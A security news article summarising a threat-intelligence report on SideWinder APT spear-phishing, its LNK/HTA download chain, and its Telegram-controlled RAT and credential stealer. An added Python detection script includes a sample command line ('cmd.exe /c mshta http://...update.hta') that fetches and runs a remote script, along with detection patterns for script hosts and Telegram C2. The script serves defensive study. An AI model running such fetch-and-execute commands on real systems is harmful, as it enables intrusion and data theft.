The Cyber Security News
SideWinder APT Attacks Regional Targets in New Campaign

February 15, 2023

Security researchers have identified dozens of new regional targets and new attack tools linked to the Indian APT group SideWinder.

The suspected state-sponsored group, also known as Rattlesnake, Hardcore Nationalist (HN2) and T-APT4, comes under the spotlight in a new report from Group-IB, Old Snake, New Skin: Analysis of SideWinder APT activity between June and November 2021.

Over that six-month period, the threat intelligence firm found that SideWinder attempted to attack 61 government, military, law enforcement and other targets in Afghanistan, Bhutan, Myanmar, Nepal and Sri Lanka.


It also linked the group to a 2020 attack on the government of the Maldives.

SideWinder's attack vector of choice remains spear-phishing email, which it sent to these targets throughout the period. Two campaigns featured emails in which the group spoofed a cryptocurrency company, Group-IB said.

If a victim clicks a malicious link in the phishing email, it downloads a malicious document, an LNK file or a malicious payload. The LNK file downloads an HTA file, which in turn downloads the payload. The payload itself may be a reverse shell, a remote access Trojan (RAT) or an information stealer, the report said.

Group-IB found two new home-grown tools used by SideWinder during the campaign: a RAT dubbed SideWinder.RAT.b and an information stealer it called SideWinder.StealerPy.

The latter is designed to harvest Google Chrome browsing history, credentials saved in the browser, the list of folders in the directory, and the metadata and contents of docx, pdf and txt files, among other data.

Both custom tools use Telegram to communicate with compromised machines rather than traditional C&C servers, as it is more convenient to do so, Group-IB said. A side effect is that the command-and-control traffic goes to legitimate, widely used infrastructure rather than to attacker-owned hosts.
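As an added illustration, not code from this page or from Group-IB's report, here is how a defender might look for the two behaviours described above: the LNK-to-HTA download chain (a script host such as mshta.exe launched from Explorer or a shell with a remote URL on its command line) and Telegram used as the C2 channel (a process other than a browser or messenger talking to a telegram.org host). The script runs over a handful of constructed, Sysmon-style process-creation and network-connection events. The event layout, the sample events, the host names, the process allowlist and the script-host list are all assumptions made for the example, not indicators taken from the report.

```python
"""Detection sketch for two SideWinder-style behaviours (added example).

Assumed input: Sysmon-like events as dicts. EventID 1 = process creation,
EventID 3 = network connection. Field names mirror Sysmon's but the events
below are constructed for this example, not real telemetry.
"""
import re
from dataclasses import dataclass

# Script hosts commonly used to fetch and run an HTA or similar stage.
# Assumed list; tune per environment.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe",
                "regsvr32.exe", "powershell.exe"}
# A double-clicked LNK runs its target as a child of explorer.exe; the LNK
# target is often cmd.exe or powershell.exe, which then launches the host.
SHELL_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Bot API traffic goes to api.telegram.org; we flag any telegram.org host
# from a process that is not a browser or the official client (assumption).
TELEGRAM_HOST_RE = re.compile(r"(^|\.)telegram\.org$", re.IGNORECASE)
TELEGRAM_ALLOWED = {"telegram.exe", "chrome.exe", "firefox.exe", "msedge.exe"}

# Constructed sample events (hypothetical paths, RFC 5737 test address).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c mshta http://203.0.113.10/update.hta"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "mshta http://203.0.113.10/update.hta"},
    # Local HTA launched from Explorer: no remote URL, so not flagged here.
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Users\alice\AppData\Local\Temp\report.hta"},
    {"EventID": 3, "Image": r"C:\Users\alice\AppData\Local\Temp\svc.exe",
     "DestinationHostname": "api.telegram.org", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Users\alice\AppData\Local\Programs\Telegram Desktop\Telegram.exe",
     "DestinationHostname": "api.telegram.org", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationHostname": "web.telegram.org", "DestinationPort": 443},
]


@dataclass(frozen=True)
class Finding:
    rule: str
    image: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_remote_script_host(ev: dict):
    """Script host started from a shell/Explorer with a URL on its command line."""
    if ev.get("EventID") != 1:
        return None
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    match = URL_RE.search(ev.get("CommandLine", ""))
    if image in SCRIPT_HOSTS and parent in SHELL_PARENTS and match:
        return Finding("script_host_remote_url", image,
                       f"{parent} -> {image} fetched {match.group(0)}")
    return None


def detect_telegram_c2(ev: dict):
    """Connection to a telegram.org host from a process not expected to use it."""
    if ev.get("EventID") != 3:
        return None
    host = ev.get("DestinationHostname", "")
    image = basename(ev.get("Image", ""))
    if TELEGRAM_HOST_RE.search(host) and image not in TELEGRAM_ALLOWED:
        return Finding("telegram_api_unexpected_process", image,
                       f"{image} -> {host}:{ev.get('DestinationPort')}")
    return None


def scan(events):
    """Apply both rules to every event and return the findings in order."""
    findings = []
    for ev in events:
        for rule in (detect_remote_script_host, detect_telegram_c2):
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.detail}")
```

On the constructed events this yields two findings: mshta.exe launched by cmd.exe with a remote URL, and the unknown svc.exe binary contacting api.telegram.org. The cmd.exe event that carries the same URL is deliberately not flagged twice, and the locally launched HTA is left to other rules, since an HTA dropped by a document rather than fetched over HTTP would not carry a URL on its command line.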

After analysing the network infrastructure used by SideWinder, the vendor said it was probably the same entity as the BabyElephant APT group.

"It is not uncommon for APT groups to borrow tools from each other, which often leads to difficulties in attribution," said Dmitry Kupin, Group-IB senior malware analyst.

"As such, we found that some indicators of compromise related to another APT group, Donot, had been wrongly attributed to SideWinder. However, we found further evidence confirming that Patchwork (Hangover), Donot and SideWinder sometimes borrow tools and malicious documents from each other and modify them for their needs."

Group-IB was unable to say how many of SideWinder's phishing attempts were successful.


Some parts of this article are sourced from:
www.infosecurity-journal.com
